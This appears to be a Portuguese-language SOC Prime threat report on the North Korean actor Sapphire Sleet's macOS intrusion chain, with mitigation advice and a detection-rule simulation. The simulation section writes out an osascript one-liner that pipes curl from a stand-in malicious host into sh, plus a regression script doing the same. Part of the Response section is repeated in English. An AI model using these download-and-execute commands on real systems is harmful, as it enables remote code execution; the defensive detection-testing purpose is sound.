SOC Prime Bias: Crítico

17 Apr 2026 15:42 UTC

Dissecando a intrusão macOS do Sapphire Sleet: da isca ao comprometimento

Author Photo
SOC Prime Team linkedin icon Seguir
Dissecando a intrusão macOS do Sapphire Sleet: da isca ao comprometimento
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Microsoft Threat Intelligence relatou uma campanha focada em macOS atribuída ao ator patrocinado pelo Estado norte-coreano Sapphire Sleet. A operação se baseia em engenharia social para persuadir os alvos a executar arquivos AppleScript maliciosos apresentados como uma atualização legítima do Zoom SDK. Uma vez executado, o script recupera cargas adicionais através de curl and osascript, expandindo a intrusão em múltiplas etapas. O malware é projetado para roubar credenciais, dados de carteiras de criptomoedas e outras informações sensíveis, além de contornar as proteções nativas de segurança do macOS para permanecer ativo em sistemas comprometidos.

Investigação

A investigação descreve uma cadeia de infecção em múltiplas etapas que começa com um .scpt arquivo de atração e continua através de uma sequência de curl-para-osascript downloads de carga. Pesquisadores identificaram vários componentes de backdoor, incluindo com.apple.cli, um binário de serviços, icloudz, e com.google.chromes.updaters. Os atores da ameaça também foram observados manipulando o banco de dados TCC do macOS para obter permissões de AppleEvents, usando técnicas de carregamento de código reflexivo, e estabelecendo persistência através de um daemon de inicialização. A atividade de exfiltração contou com strings de agente de usuário personalizados e comunicações pelo Telegram Bot API.

Mitigação

A Apple já lançou atualizações de Safe Browsing e XProtect para interromper a infraestrutura da campanha e os componentes de malware. A Microsoft recomenda bloquear a execução de arquivos .scpt , restringir pipelines inseguros curl , monitorar mudanças não autorizadas no banco de dados TCC e auditar instalações de daemon de inicialização para entradas suspeitas. Os usuários também devem ser advertidos sobre prompts de atualização de software não solicitados e orientados a não fornecer credenciais por meio de diálogos ou scripts inesperados.

Resposta

Os defensores devem detectar a execução maliciosa de AppleScript, strings de agente de usuário anormais e conexões de saída para domínios de comando e controle conhecidos. Quaisquer binários identificados e daemons de inicialização devem ser colocados em quarentena ou removidos imediatamente, seguidos por redefinições de credenciais para usuários afetados e validação da integridade do banco de dados TCC. Respondedores de incidentes também devem realizar análises forenses em artefatos de sistemas coletados e restaurar dados impactados a partir de backups limpos sempre que necessário. curl user-agent strings, and outbound connections to known command-and-control domains. Any identified binaries and launch daemons should be quarantined or removed immediately, followed by credential resets for affected users and validation of TCC database integrity. Incident responders should also perform forensic analysis on collected system artifacts and restore impacted data from clean backups wherever necessary.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: A Verificação de Telemetria e Linha de Base Pré‑voo deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa de Ataque & Comandos:
    Um adversário obteve um script estilo PowerShell malicioso hospedado em um servidor remoto. Para evitar a criação de um binário autônomo, eles aproveitam o interpretador nativo do AppleScript (osascript) e encaminham um curl download diretamente no interpretador, alcançando um “download‑e‑executar” em um único comando. Isso corresponde ao osascript + curl padrão da regra.

    # Linha única maliciosa que deve acionar a regra
    osascript -e 'do shell script "curl -s https://malicious.example.com/payload.sh | sh"'

    A linha de comando contém ambos osascript and curl, então a condição da regra Sigma (selection_osascript and selection_curl) avalia como verdadeiro.

  • Script de Teste de Regressão:

    # simulate_osascript_curl.sh
    # Propósito: Reproduzir a telemetria exata que deve disparar a regra de detecção.
    set -e
    
    # Defina uma carga inofensiva para segurança (echo em vez de código maligno real)
    MALICIOUS_URL="https://example.com/benign_payload.sh"
    
    # Crie uma carga benigna fictícia que apenas imprime uma mensagem.
    # Em um teste real de equipe vermelha, você hospedaria um script real; aqui o mantemos seguro.
    curl -s -o /tmp/benign_payload.sh "$MALICIOUS_URL" || true
    
    # Execute o AppleScript com curl encanado em um comando shell.
    osascript -e "do shell script "curl -s $MALICIOUS_URL | sh""
  • Comandos de Limpeza:

    # cleanup_osascript_curl.sh
    # Remova quaisquer arquivos temporários e encerre processos errantes.
    rm -f /tmp/benign_payload.sh
    pkill -f "osascript -e"